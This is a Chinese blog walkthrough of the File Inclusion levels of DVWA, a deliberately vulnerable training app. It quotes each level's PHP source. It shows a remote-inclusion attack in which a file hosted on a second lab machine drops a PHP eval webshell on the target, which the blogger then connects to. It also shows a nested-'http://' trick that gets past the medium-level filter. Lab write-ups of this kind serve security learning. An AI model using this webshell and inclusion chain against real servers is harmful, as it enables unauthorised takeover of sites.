DVWA闯关File Inclusion

最新推荐文章于 2023-01-08 11:32:00 发布
最新推荐文章于 2023-01-08 11:32:00 发布
阅读量207 收藏 1
点赞数
分类专栏: DVWA 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/108248077
版权

前提准备:
为了保证实验效果,要确定开启了文件包含在这里插入图片描述

低级难度

先来看一下源代码

<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>

可以看到没有做任何过滤,我们可以任意文件包含。
首先尝试包含一个不存在的文件,出现了报错,并且显示出了网站的路径
在这里插入图片描述
现在直接远程包含,拿下它。靶机NAT,再额外准备一台NAT电脑让二者能够互相访问。说起来容易,做起来难。
排雷现场:
在远程主机上写下如下代码,起名为1.php

<?php
fputs(fopen("shell.php","w"),"<?php eval(\$_POST[123]);?>")?>

然后让靶机去远程包含,如下

http://192.168.40.131/DVWA-master/vulnerabilities/fi/?page=http://192.168.40.128/1.php

结果是会出现报错,无论是在远程主机上直接用浏览器访问还是远程包含,都会报错,并且没有生成一个名为shell.php的文件(如果你的靶机没有报错,请检查是否生成了shell.php)

解决办法:
把远程主机的1.php文件改名为1.txt即可(挺神奇的哈)
1:先访问远程主机
在这里插入图片描述
2:靶机远程文件包含
在这里插入图片描述
3:访问shell.php
在这里插入图片描述
4:去靶机上确认
路径:C:\phpstudy\WWW\DVWA-master\vulnerabilities\fi
在这里插入图片描述
5:蚁剑连接
注意,连接的是shell.php文件所在地址
在这里插入图片描述
在这里插入图片描述

中级难度

先来看一下源代码

<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
?>

可以看到,把"http://", “https://”,"…/", "…"替换为了空字符,复写http即可使用远程文件包含。(为了保证实验效果,还是先删除前面生成的shell.php比较好)
1:选中复制http://
在这里插入图片描述
2:粘贴进去(蓝色部分为粘贴进去的内容)
在这里插入图片描述
之后的套路就跟前面一样了

高级难度

先看一下源代码

<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}
?>

高级难度对文件名做了限制,必须为 file* 或者 include.php才行,只能考虑本地文件包含了,但是要怎样才能包含恶意文件呢?需要利用文件上传模块上传恶意文件,然后去包含。如果你能够上传,怎样上传请参考“文件上传”。
这里演示一下本地文件包含:
在这里插入图片描述

不可能难度

<?php
// The page we wish to display
$file = $_GET[ 'page' ];
 
// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}
?>

可以看到采用了白名单过滤,即便上传同名文件也会因为同名的缘故被系统更改文件名,避免了文件包含漏洞

lainwith
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络攻防入门---文件包含漏洞
濯君
12-27 287
有些网页具有包含其他页面到当前页面的功能,是通过URL设置参数添加进来的,比如下面这个URL http://192.168.232.128/dvwa/vulnerabilities/fi/?page=include.php 将include.php包含进来 一:low级别 <?php $file = $_GET['page']; //The page we wish to display ?> 因为源码中没有对页面进行检查,直接包含,所以可以随意引入其他页面 比如引入c.p
DVWA靶机通关攻略第四关——文件包含
小飞飞的博客
03-11 601
DVWA靶机的文件包含详细教学
dvwa系列-文件包含
一个安全研究员
05-22 9390
科普 文件包含说起来也是属于注入的一种,都是由于服务器配置或者对用户输入过滤不严格导致用户可以恶意数据达到自己想要的目的。 对于php来说,常见的文件包含函数有如下: 1.include() 2.include_once() 3.require() 4.require_once() 5.file_open() ……. 文件包含的功能被设计来实现模块化开发,代码共享,提升开发效率,...
PHP代码审计6—文件包含漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
07-27 1824
文件包含漏洞整理与历史漏洞分析
文件包含漏洞攻击(DVWA)
魔仙棒棒之主的博客
05-11 2750
文件包含漏洞攻击DVWA一、文件包含漏洞二、Low难度1. 源码分析2. 本地文件包含LFI1)相对路径2)绝对路径3. 远程文件包含RFI三、Medium难度1. 源码分析2. 本地文件包含LFI1)相对路径2)绝对路径3. 远程文件包含RFI四、High难度1. 源码分析2. 本地文件包含五、Impossible难度1. 源码分析 一、文件包含漏洞 PHP文件包含漏洞是一种注入型漏洞 注入型漏洞还有XSS漏洞和SQL注入漏洞 PHP的文件包含可以直接执行包含文件的代码 包含的文件格式 是不受限制的,只要
DVWA 共12关通关笔记
09-12
基本上都过来了。
DVWA通关手册.docx
08-19
文档内部包含DVWA平台,所有类型漏洞低中高等级的攻击过程,非常仔细。也有部分自己的攻击方法,值得一试。
DVWA Installation
08-15
DVWA all package. DVWA-master.zip
DVWA-master.zip
01-04
DVWA-master.zip
DVWA 文件包含
m0_73606240的博客
01-08 761
DVWA File Include
DVWA—文件包含漏洞(File Inclusion
qq_54537919的博客
06-27 1133
DVWA—文件包含漏洞(File Inclusion
DVWA闯关File Upload
LainWith的博客
08-27 231
低级难度 先来看一下源代码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // Can we move the
文件包含-DVWA练习
qq_63087425的博客
10-20 1118
首先,我们需要大概知道文件包含是什么,可能会产生哪些漏洞,如何利用这些漏洞看相关文章环境:win10+phpstudy。
DVWA通关 File Inclusion
干铮的博客
08-06 213
文件包含漏洞 File Inclusion 程序开发⼈员通常会把可重复使⽤函数写到单个⽂件中,在使⽤某个函数的时候,直接调⽤此⽂件,⽆需再次编写,这种调⽤⽂件的过程通常称为包含。 程序开发⼈员都希望代码更加灵活,所以会把被包含的⽂件的路径设置为变量,来进⾏动态调⽤,但是正是由于这种灵活性,如果被包含⽂件的路径客户端可控,造成⽂件包含漏洞。 ⼏乎所有的脚步都会提供⽂件包含的功能,⽂件包含漏洞在PHP 的Web 应⽤中居多,在JSP/ASP/ASP.NET 程序中⽐较少。 文件包含的原理 配置文件开启文
文件包含漏洞攻防
Chenamao的博客
08-05 943
目录 文件包含 PHP中的文件包含语句: 漏洞原理及特点 文件包含漏洞攻防 文件包含漏洞利用 读取敏感文件 直接包含图片木马 PHP封装协议 *读取本地文件: *读取PHP文件源码 利用php://input执行PHP命令 漏洞修复方案 文件包含 名词解释:程序开发人员通常会把可重复使用的函数或语句写到单个文件中,在使用某个功能的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 程序开发人员都希望代码更加灵活,所以会把被包含的文件的路径设置为变量,来进行动.
dvwa文件包含_DVWA中等级通关指南-超详细版
weixin_40006763的博客
11-29 248
欢迎大家光临我的博客一起交流学习呀~http://www.chenjingjiu.cn1.Brute Force上篇文章截的图太多了,这回就不给大家截题目了,重点的图还是会有的哦~从源码可以看到,只有红框框出来的地方发生了变化。这个mysql_real_escape_string()是干什么的呢?简单来说就是对一些特殊字符进行了转义,那低等级时候用到的注入就失效了吧,这回就只能老老实实爆破了,而且...
PHP漏洞之文件包含漏洞
dogeace的博客
11-28 1699
在php语言中存在着下面几个函数存在文件包含的的功能,这些函数的本意是方便开发者及用户实现某些功能,但是如果不对文件包含的内容进行严格的的限定,会被攻击者恶意利用。这就是php的文件包含漏洞。下面有四个函数可以实现文件包含分别是: 1.include();用此函数包含的时候,如果出现错误,会提出警告,跳过此步骤继续执行剩下的代码。 2.require();此函数文件包含出现错误的时候,终止程序的运行,与include()区别就是这里。 3.include_once()与1的唯一区别是文件只被包含一次,避免文
文件包含漏洞File Inclusion
weixin_34101784的博客
06-20 532
文件包含漏洞 文件包含分类 LFI:本地文件包含(Local File Inclusion) RFI:远程文件包含(Remote File Inclusion) 与文件包含有关的函数 include():只有代码执行到该函数时才会包含文件进来,发生错误时只给出一个警告并继续向下执行。 include_once():和 include()功能相同,区别在于当重复调用同一文件时...
DVWA系列之File Inclusion(文件包含)源码分析及漏洞利用
7Riven's blog
11-27 1112
什么是文件包含? 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。 文件包含漏洞的成因 随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变 量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过...
dvwa file inclusionfile upload
最新发布
05-12
其中包括文件包含(File Inclusion)和文件上传(File Upload)两种漏洞。 文件包含漏洞是指Web应用程序未对用户输入的文件路径进行充分验证,导致攻击者能够构造恶意的文件路径来读取、执行或删除服务器上的敏感...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值